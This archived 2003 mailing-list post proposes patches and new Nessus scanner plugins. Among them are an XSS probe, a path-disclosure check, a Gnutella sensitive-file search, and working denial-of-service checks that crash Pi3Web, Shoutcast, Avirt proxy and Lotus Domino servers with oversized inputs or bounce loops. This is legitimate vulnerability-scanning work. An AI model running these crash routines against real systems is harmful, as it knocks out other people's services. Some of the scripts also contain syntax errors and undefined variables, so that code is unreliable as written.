Miscellaneous plugins & patchs

From: Michel Arboi (mikhailat_private)
Date: Tue May 06 2003 - 07:25:38 PDT

  • Next message: Noam Rathaus: "Re: False positives due to Dual Behavior of ports"

    Should I commit some of these in the CVS repository?
    
    
    
    --- nessus-plugins/scripts/cross_site_scripting.nasl	24 Mar 2003 18:29:12 -0000	1.13
    +++ nessus-plugins/scripts/cross_site_scripting.nasl	6 May 2003 07:46:21 -0000
    @@ -6,8 +6,16 @@
     # false positive fix by Andrew Hintz - http://guh.nu - 1.3.2002 
     # Update by rd: thanks to Andrew's remarks, HTTP headers are discared
     # Update by Chris Sullo - sqat_private - 06/27/2002 -- added .cfm test
    +# Update by Michel Arboi - arboiat_private - 2002-05-04 -- added "dir part"
     # 
     # Covers BID 5305 / CVE CAN-2002-1060
    +#
    +# References:
    +# Date:  Fri, 2 Feb 2001 07:50:45 -0500
    +# From: twi252at_private
    +# Subject: WebSphere - Minor CSS Issue.
    +# To: BUGTRAQat_private
    +#
     
     if (description)
     {
    @@ -58,38 +66,36 @@
     
     port = get_kb_item("Services/www");
     if(!port)port = 80;
    +if(! get_port_state(port)) exit(0);
     
    -dir[0] = ".jsp";
    -dir[1] = ".shtml";
    -dir[2] = ".thtml";
    -dir[3] = ".cfm";
    -dir[4] = "";
    +# 2002-05-04 (MA) I added /../ because some servers are vulnerable to it
    +# e.g. IBM_HTTP_Server/1.3.6.3 Apache/1.3.7-dev 
    +# While I was here, I added /? too because IIRC, tis might work
     
    -if(get_port_state(port))
    -{
    - for (i = 0; dir[i] ; i = i + 1)
    +dirs = make_list("/", "/../", "/?");
    +exts = make_list(".jsp", ".shtml", ".thtml", ".cfm", "");
    +
    +confirmtext = string("<SCRIPT>alert('Vulnerable')</SCRIPT>"); 
    +
    +foreach d (dirs)
    +  foreach e (exts)
      {
       soc = http_open_socket(port);
    -  if(soc)
    -   {
    -    url = string("/<SCRIPT>alert('Vulnerable')</SCRIPT>", dir[i]);
    +    if(! soc) exit(0);
    +
    +    url = string(d, "<SCRIPT>alert('Vulnerable')</SCRIPT>", e);
         
    -    confirmtext = string("<SCRIPT>alert('Vulnerable')</SCRIPT>"); 
         req = http_get(item:url, port:port);
         send(socket:soc, data:req);
         head = http_recv_headers(soc);
         r = http_recv(socket:soc);
         http_close_socket(soc);
     
    -    
         if(confirmtext >< r)
           {
            security_warning(port);
            exit(0);
           }
        }
    -   else exit(0);
    - }
    -}
    -
    +
    --- nessus-plugins/scripts/http_func.inc	7 Apr 2003 10:40:40 -0000	1.43
    +++ nessus-plugins/scripts/http_func.inc	6 May 2003 07:46:21 -0000
    @@ -297,4 +297,30 @@
      return(kb); 
     }
     
    +function locate_cgi(port, item)
    +{
    +  local_var	k1, k, u, cgis, c, name;
    +
    +  item = tolower(item);
    +  k1 = string("/tmp/cgi/", port, "/", item);
    +  u = get_kb_item(k1);
    +  if (u) return u;
    +  k = string("www/", port, "/cgis");
    +  cgis = get_kb_list(k);
    +  if (! isnull(cgis))
    +    foreach c (cgis)
    +    {
    +      u = ereg_replace(string: c, pattern: " +- .*", replace: "");
    +      name = ereg_replace(string: u, pattern: "([^/]*)$", replace: "\1");
    +      name = tolower(name);
    +      if (name == item)
    +      {
    +        set_kb_item(name: k1, item: u);
    +        return u;
    +      }
    +    }
    +  #foreach c (cgi_dirs())
    +  # TBD
    +  return;	# NULL
    +}
    --- nessus-plugins/scripts/pi3web_dos.nasl	14 Sep 2002 19:12:22 -0000	1.3
    +++ nessus-plugins/scripts/pi3web_dos.nasl	6 May 2003 07:46:21 -0000
    @@ -1,7 +1,6 @@
     #
     # This script was written by Renaud Deraison <deraisonat_private>
    -#
    -#
    +# Michel Arboi added the DoS code (I love DoS)
     #
     # See the Nessus Scripts License for details
     #
    @@ -9,6 +8,12 @@
     #
     # Refs: http://online.securityfocus.com/archive/1/250126
     #
    +# From: "Tamer Sahin" <tsat_private>
    +# To: bugtraqat_private
    +# Subject: Pi3Web Webserver v2.0 Buffer Overflow Vulnerability
    +# Date: Mon, 14 Jan 2002 01:00:39 +0200
    +# Affiliation: http://www.securityoffice.net
    +#
     
     if(description)
     {
    @@ -40,7 +45,7 @@
      script_summary(english:summary["english"]);
     
      # Category
    - script_category(ACT_GATHER_INFO);
    + script_category(ACT_MIXED_ATTACK);
     
      # Dependencie(s)
      script_dependencie("find_service.nes", "http_version.nasl");
    @@ -64,12 +69,32 @@
     port = get_kb_item("Services/www");
     if(!port) port = 80;
     
    -
    +if (safe_checks())
    +{
     banner = get_http_banner(port:port);
     if(banner)
     {
      if(egrep(pattern:"^Server: Pi3Web/2\.0\.0", string:banner))
            security_hole(port);
     }
    +  exit(0);
    +}
    +
    +if (http_is_dead(port: port)) exit(0);
    +cgi = locate_cgi(port: port, item: "hello.exe");
    +if (isnull(cgi)) exit(0);
    +
    +req = http_get(port: port, item: strcat(cgi, "?", crap(224)));
    +
    +for (i = 0; i < 5; i ++)	# is 5 enough?
    +{
    +  soc = http_open_socket(port);
    +  if (! soc) break;
    +  send(socket: soc, data: req);
    +  r = http_recv(socket: soc);
    +  http_close_socket(soc);
    +}
    +
    +if (http_is_dead(port: port)) security_hole(port);
     
    --- nessus-plugins/scripts/savant_cgitest.nasl	1 May 2003 22:10:23 -0000	1.6
    +++ nessus-plugins/scripts/savant_cgitest.nasl	6 May 2003 07:46:21 -0000
    @@ -68,8 +68,8 @@
      if (! soc) exit(0);
     
      len = 256;	# 136 should be enough
    - req = string("POST /cgi-bin/cgitest.exe HTTP/1.0\r\nContent-Length: ", len,
    + req = string("POST ", p " HTTP/1.0\r\nContent-Length: ", len,
     	"\r\n\r\n", crap(len), "\r\n");
      send(socket:soc, data:req);
      http_close_socket(soc);
    --- nessus-plugins/scripts/smtp_func.inc	7 Apr 2003 10:40:40 -0000	1.18
    +++ nessus-plugins/scripts/smtp_func.inc	6 May 2003 07:46:21 -0000
    @@ -10,10 +10,12 @@
       send(socket: socket, data: string("RSET\r\n"));
       buff = recv_line(socket: socket, length: 2048);
       # Here, we might test the return code
    +  if (from !~ ' *<.*> *') from = strcat('<', from, '>');
       send(socket: socket, data: string("MAIL FROM: ", from, "\r\n"));
       buff = recv_line(socket: socket, length: 2048);
       if (! ereg(pattern:"^2[0-9][0-9] ", string:buff)) { return (0); }
       
    +  if (to !~ ' *<.*> *') to = strcat('<', to, '>');
       send(socket: socket, data: string("RCPT TO: ", to, "\r\n"));
       buff = recv_line(socket: socket, length: 2048);
       if (! ereg(pattern:"^2[0-9][0-9] ", string:buff)) { return (0); }
    
    
    #
    # This script was written by Michel Arboi <arboiat_private>
    #
    #
    # GPL
    #
    # Vulnerable servers:
    # Pi3Web/2.0.0
    #
    # References
    # Date:  10 Mar 2002 04:23:45 -0000
    # From: "Tekno pHReak" <tekat_private>
    # To: bugtraqat_private
    # Subject: Pi3Web/2.0.0 File-Disclosure/Path Disclosure vuln
    #
    
    if(description)
    {
     script_id(11600);
     script_version ("$Revision$");
     name["english"] = "Pi3web Physical Path Disclosure Vulnerability";
    
     script_name(english:name["english"]);
     
     desc["english"] = "
    Your web server reveals the physical path of the webroot 
    when asked for a non-existent page.
    if it is incorrectly configured. Whilst printing errors 
    to the output is useful for debugging applications, this 
    feature should not be enabled on production servers.
    
    Solution : Upgrade your server or reconfigure it
    
    Risk factor : Low";
    
     script_description(english:desc["english"]);
     
     summary["english"] = "Tests for pi3web Physical Path Disclosure Vulnerability";
     
     script_summary(english:summary["english"]);
     
     script_category(ACT_GATHER_INFO);
     
     script_copyright(english:"This script is Copyright (C) 2003 Michel Arboi");
     family["english"] = "CGI abuses";
     family["francais"] = "Abus de CGI";
     script_family(english:family["english"], francais:family["francais"]);
     script_dependencie("find_service.nes", "no404.nasl");
     script_require_ports("Services/www", 80);
     exit(0);
    }
    
    # 
    
    include("http_func.inc");
    include("http_keepalive.inc");
    
    ext = make_list(".", ".html", ".htm", ".jsp", ".asp", ".shtm", ".shtml",
    		".php", ".php3", ".php4");
    
    port = get_kb_item("Services/www");
    if(! port) port = 80;
    if(! get_port_state(port)) exit(0);
    
    foreach e (ext)
    {
      f = string("niet", rand());
      req = http_get(item:string("/", f, e), port:port);
      r = http_keepalive_send_recv(port: port, data: req);
      if(isnull(r)) exit(0);	# Connection refused
      # Windows-like path
      if (ereg(string: r, pattern: strcat("[C-H]:(\\\\[A-Za-z0-9_.-])*\\", f, "\\", e))
      {
        security_warning(port);
        exit(0);
       }
      # Unix like path
      if (ereg(string: r, pattern: strcat("(/[A-Za-z0-9_.+-])+/", f, "/", e)))
      {
        security_warning(port);
        exit(0);
       }
    }
    
    
    #
    # This script was written by Michel Arboi <arboiat_private>
    # GPL
    # *untested*
    #
    # Cf. RFC 1945 & RFC 2068
    # 
    # Vulnerables:
    # Avirt SOHO v4.2
    # Avirt Gateway v4.2
    # Avirt Gateway Suite v4.2
    # 
    # References:
    # Date:  Thu, 17 Jan 2002 20:23:28 +0100
    # From: "Strumpf Noir Society" <vuln-devat_private>
    # To: bugtraqat_private
    # Subject: Avirt Proxy Buffer Overflow Vulnerabilities
    # 
    
    
    
    if(description)
    {
      script_id(11605);
      script_version ("$Revision$");
      name["english"] = "Header overflow against HTTP proxy";
      script_name(english:name["english"]);
     
      desc["english"] = "It was possible to kill the HTTP proxy by
    sending an invalid request with a too long header
    
    A cracker may exploit this vulnerability to make your proxy server
    crash continually or even execute arbitrary code on your system.
    
    Solution : upgrade your software
    Risk factor : High";
    
      script_description(english:desc["english"]);
     
      summary["english"] = "Too long HTTP header kills the HTTP proxy server";
      script_summary(english:summary["english"]);
     
      script_category(ACT_DESTRUCTIVE_ATTACK);
     
      script_copyright(english:"This script is Copyright (C) 2003 Michel Arboi");
      family["english"] = "Gain root remotely";
      family["francais"] = "Passer root à distance";
      script_family(english:family["english"], francais:family["francais"]);
      script_require_ports("Services/www", 8080);
      script_dependencie("find_service.nes", "httpver.nasl", "http_version.nasl");
      exit(0);
    }
    
    ########
    
    include("http_func.inc");
    
    port = get_kb_item("Services/www");
    if(!port) port = 8080;
    if(! get_port_state(port)) exit(0);
    if (http_is_dead(port: port)) exit(0);
    
    soc = open_sock_tcp(port);
    if(! soc) exit(0);
    
    test_host = "www.nessus.org";	# Change this!
    
    headers = make_list(
    	string("From: ", crap(2048), "@", crap(2048), ".org"),
    	string("If-Modified-Since: Sat, 29 Oct 1994 19:43:31 ", 
    		crap(data: "GMT", length: 4096)),
    	string("Referer: http://", crap(4096), "/"),
    # Many other HTTP/1.1 headers...
    	string("If-Unmodified-Since: Sat, 29 Oct 1994 19:43:31 ", 
    		crap(data: "GMT", length: 2048))	);
    	
    
    r1 = string("GET http://", test_host, "/", rand(), " HTTP/1.0\r\n");
    
    foreach h (headers)
    {
      r = string(r1, h, "\r\n\r\n");
      send(socket:soc, data: r);
      r = http_recv(socket:soc);
      close(soc);
      soc = open_sock_tcp(port);
      if (! soc)  {  security_hole(port); exit(0); }
    }
    
    close(soc);
    
    if (http_is_dead(port: port)) {  security_hole(port); exit(0); }
    
    
    #
    # Copyright 2003 by Michel Arboi <arboiat_private>
    #
    # GNU Public Licence
    #
    
    if(description)
    {
     script_id(11601);
     script_version ("$Revision$");
    
     name["english"] = "Misconfigured Gnutella";
     script_name(english:name["english"]);
    
     
     script_description(english:desc["english"]);
    
     summary["english"] = "Detect sensitive files shared by Gnutella";
     script_summary(english:summary["english"]);
    
     script_category(ACT_GATHER_INFO);
    
     script_copyright(english:"This script is Copyright (C) 2003 Michel Arboi");
     family["english"] = "General";
     script_family(english:family["english"]);
    
     script_dependencie("find_service.nes", "gnutella_detec.nasl");
     script_require_ports("Services/gnutella", 6346);
     exit(0);
    }
    
    #
    
    function gnutella_read_data(socket, message)
    {
      local_var	len, i, r2;
      len = 0;
      for (i = 22; i >= 19; i --)
        len = len * 256 + ord(message[i]);
      if (len > 0)
        r2 = recv(socket: soc, length: len);
      return r2;
    }
    
    function gnutella_search(socket, search)
    {
      local_var	MsgId, Msg, r1, r2;
    
      MsgId = rand_str(length: 16);
      Msg = raw_string(	MsgId,			# Message ID
    			128,			# Function ID
    			1,			# TTL
    			0,			# Hops taken
    			strlen(search)+3, 0, 
    			0, 0,			# Data length (little endian)
    			0, 0,			# Minimum speed (LE)
    			search, 0);
      send(socket: socket, data: Msg);
    
    # We might get Ping and many other Gnutella-net messages
    # We just read and drop them, until we get our answer.
      while (1)
      {
        r1 = recv(socket: soc, length: 23);
        if (strlen(r1) < 23)
          return;
        r2 = gnutella_read_data(socket: socket, message: r1);
        if (ord(r1[16]) == 129 && substr(r1, 0, 15) == MsgId)
          return r2;
      }
    }
    
    #
    
    include("misc_func.inc");
    
    port = get_kb_item("Services/gnutella");
    if (! port) port = 6346;
    if (! get_port_state(port)) exit(0);
    soc = open_sock_tcp(port);
    if (! soc) exit(0);
    
    send(socket:soc, data: 'GNUTELLA CONNECT/0.4\n\n');
    r = recv(socket: soc, length: 13);
    if (r != 'GNUTELLA OK\n\n')
    {
      security_note(port: port, data: 'This Gnutella servent rejected the connection: ' + r);
      close(soc);
      exit(0);
    }
    
    # GTK-Gnutella sends a ping on connection
    r = recv(socket: soc, length: 23);
    if (strlen(r) >= 23)
    {
      r2 = gnutella_read_data(socket: soc, message: r);
      if (ord(r[16]) == 0)	# Ping
      {
        # Pong  (phony answer)
        MsgId = substr(r, 0, 15);
        ip = this_host();
        #display("ip=", ip, "\n");
        x = eregmatch(string: ip, pattern: "([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)");
        #display("ip=", x, "\n");
        Msg = raw_string(	MsgId,
    			1,	# pong
    			1,	# TTL
    			0,	# Hop
    			14, 0, 0, 0, 
    			11, 11,			# Listening port
    			int(x[1]), int(x[2]), int(x[3]), int(x[4]),	# IP
    			1, 1, 0, 0, 	# File count (little endian)
    			1, 1, 0, 0);	# KB count
       send(socket: soc, data: Msg);
      }
    }
    
    dangerous_file = 
    	make_list("boot.ini", "win.ini", "autoexec.bat", 
    	"config.sys", "io.sys", "msdos.sys", "pagefile.sys", 
    	"inetd.conf", "host.conf");
    foreach d (dangerous_file)
    {
      r = gnutella_search(socket: soc, search: d);
      if (! isnull(r) && ord(r[0]) > 0)
      {
        security_warning(port: port, data: "
    It seems that your root directory is visible through 
    the Gnutella servent.
    Confidential files might be exported.
    
    Solution : disable this Gnutella servent or configure it correctly
    Risk factor : High");
        close(soc);
        exit(0);
      }
    }
    
    close(soc);
    
    
    #
    # This script was written by Michel Arboi <arboiat_private>
    #
    # GPL...
    #
    # References
    # Date:  Mon, 20 Aug 2001 21:19:32 +0000
    # From: "Ian Gulliver" <ianat_private>
    # To: bugtraqat_private
    # Subject: Lotus Domino DoS
    #
    
    if(description)
    {
     script_id(11603);
     script_version ("$Revision$");
     name["english"] = "Lotus Domino SMTP bounce DoS";
     script_name(english:name["english"]);
     
     desc["english"] = "
    The remote SMTP server (maybe a Lotus Domino) was killed 
    or disabled by a malformed message that bounces to himself.
    The routing loop exhausts all resources.
    
    A cracker may use this to crash it continuously.
    
    Solution: Reconfigure your MTA or upgrade it
    
    Risk factor : High";
    
     script_description(english:desc["english"]);
     
     summary["english"] = "Broken message bounced to himself exhausts MTA";
     script_summary(english:summary["english"]);
     
     script_category(ACT_DENIAL);
     
     script_copyright(english:"This script is Copyright (C) 2003 Michel Arboi");
     family["english"] = "Denial of Service";
     family["francais"] = "Déni de service";
     script_family(english:family["english"], francais:family["francais"]);
    
     # Avoid this test if the server relays e-mails.
     script_dependencie("find_service.nes", "smtp_settings.nasl",
    	"smtp_relay.nasl");
     script_exclude_keys("SMTP/spam");
     script_require_ports("Services/smtp", 25);
     exit(0);
    }
    
    #
    
    include("smtp_func.inc");
    
    # Disable the test if the server relays e-mails.
    if (get_kb_item("SMTP/spam"))
    {
      #display("lotus_bounce_DoS.nasl disabled on mail relays\n");
      exit(0);
    }
    
    #
    n_sent = 0;
    
    fromaddr = string("bounce", rand(), "@[127.0.0.1]";
    toaddr = string("nessus", rand(), "@invalid", rand(), ".net");
    
    port = get_kb_item("Services/smtp");
    if (!port) port = 25;
    
    if(!get_port_state(port))exit(0);
    
    
    buff = smtp_recv_banner(socket:s);
    
    b = string("From: nessus\r\nTo: postmast\r\n",
    	"Subject: SMTP bounce denial of service\r\n\r\ntest\r\n");
    
    n = smtp_send_port(port: port, from: fromaddr, to: toaddr, body: b);
    if (! n) exit(0);
    sleep(1);
    
    flag = 1;
    soc = open_sock_tcp(port);
    if (soc)
    {
      send(socket: soc, data: string("HELO nessus\r\n"));
      buff = recv_line(socket: soc, length:2048);
      if (buff =~ "^2[0-9][0-9] ")
        flag = 0;
      send(socket: soc, data: string("QUIT\r\n"));
      close(soc);
    }
    if (flag) security_hole(port);
    
    
    
    
    
    #
    # This script was written by Michel Arboi <arboiat_private>
    #
    # GNU Public LicenceSee the Nessus Scripts License for details
    #
    # References:
    # Date:  Mon, 21 Jan 2002 22:04:58 -0800
    # From: "Austin Ensminger" <skreamat_private>
    # Subject: Re: Shoutcast server 1.8.3 win32
    # To: bugtraqat_private
    #
    # http://www.egoclan.barrysworld.net/sc_crashsvr.txt
    #
    # Date:  19 Jan 2002 18:16:49 -0000
    # From: "Brian Dittmer" <bdittat_private>
    # To: bugtraqat_private
    # Subject: Shoutcast server 1.8.3 win32
    #
    
    if(description)
    {
      script_id(11604);
      script_version ("$Revision$");
      name["english"] = "admin.cgi overflow";
      script_name(english:name["english"]);
     
      desc["english"] = "
    The SHoutcast server crashes when a too long argument is 
    given to admin.cgi
    A cracker may use this flaw to prevent your server from
    working, or worse, execute arbitrary code on your system.
    
    Solution : upgrade Shoutcast to the latest version.
    
    Risk factor : Serious";
    
    
      script_description(english:desc["english"]);
     
      summary["english"] = "Overflows admin.cgi";
      script_summary(english:summary["english"]);
      script_category(ACT_MIXED_ATTACK);
     
     
      script_copyright(english:"This script is Copyright (C) 2003 Michel Arboi");
      family["english"] = "CGI abuses";
      family["francais"] = "Abus de CGI";
      script_family(english:family["english"], francais:family["francais"]);
      script_dependencie("find_service.nes", "no404.nasl");
      script_require_ports("Services/www", 8000);
      # Shoutcast is often on a high port
      exit(0);
    }
    
    # The script code starts here
    
    include("http_func.inc");
    include("http_keepalive.inc");
    
    if (safe_checks())
    {
      port = is_cgi_installed("admin.cgi");
      if (port)
      {
        report = "
    admin.cgi was detected on this server. 
    Shoutcast server installs a version that is vulnerable to
    a buffer overflow.
    
    ** Note that Nessus did not try to exploit the flaw,
    ** so this might be a false alert.
    
    Solution : upgrade Shoutcast to the latest version.
    Risk factor : Serious";
        security_hole(port: port, data: report);
      }
      exit(0);
    }
    
    include("http_func.inc");
    
    port = get_kb_item("Services/www");
    if(!port) port = 80;
    
    if(!get_port_state(port)) exit(0);
    
    if (http_is_dead(port: port)) exit(0);
    
    ac = locate_cgi(port: port, item: "admin.cgi");
    if (! ac) exit(0);
    
    url = string(ac, "?pass=", crap(4096));
    req = http_get(item: url, port:port);
    r = http_keepalive_send_recv(port:port, data:req);
    
    url = string(ac, "?", crap(4096));
    req = http_get(item: url, port:port);
    r = http_keepalive_send_recv(port:port, data:req);
    
    if (http_is_dead(port: port))
    {
      security_hole(port: port);
       exit(0);
    }
    
    
    
    # This script was written by Michel Arboi <arboiat_private>
    #
    # Refereces:
    # RFC 2660 The Secure HyperText Transfer Protocol
    #
    
    if(description)
    {
     script_id(11602);
     script_version ("$Revision$");
     
     name["english"] = "Detect S-HTTP";
     script_name(english:name["english"]);
     
     desc["english"] = "
    This web server supports S-HTTP, a cryptographic layer 
    that was defined in 1999 by RFC 2660. 
    S-HTTP has never been widely implemented and you should 
    use HTTPS instead.
    
    As rare or obsolete code is often badly tested, it would be 
    safer to use another server or disable this layer somehow.
    
    Risk factor : Low";
    
    
     script_description(english:desc["english"]);
     
     summary["english"] = "Checks if the web server accepts the Secure method";
     
     script_summary(english:summary["english"]);
     script_category(ACT_GATHER_INFO);
     
     
     script_copyright(english:"This script is Copyright (C) 2003 Michel Arboi");
     family["english"] = "General";
     family["francais"] = "General";
     script_family(english:family["english"], francais:family["francais"]);
     script_dependencie("find_service.nes", "no404.nasl");
     script_require_ports("Services/www", 80);
     exit(0);
    }
    
    #
    
    port = get_kb_item("Services/www");
    if (! port) port = 80;
    if (!get_port_state(port)) exit(0);
    
    soc = http_open_socket(port);
    req = string("Secure * Secure-HTTP/1.4\r\n",
    		"Host: ", get_host_name(), ":", port, "\r\n",
    		"Connection: close\r\n",
    		"\r\n");
    send(socket: soc, data: req);
    r = recv_line(socket: soc, length: 256);
    http_close_socket(soc);
    if ('Secure-HTTP/1.4 200 ' >< r) security_warning(port);
    



    This archive was generated by hypermail 2b30 : Tue May 06 2003 - 01:25:19 PDT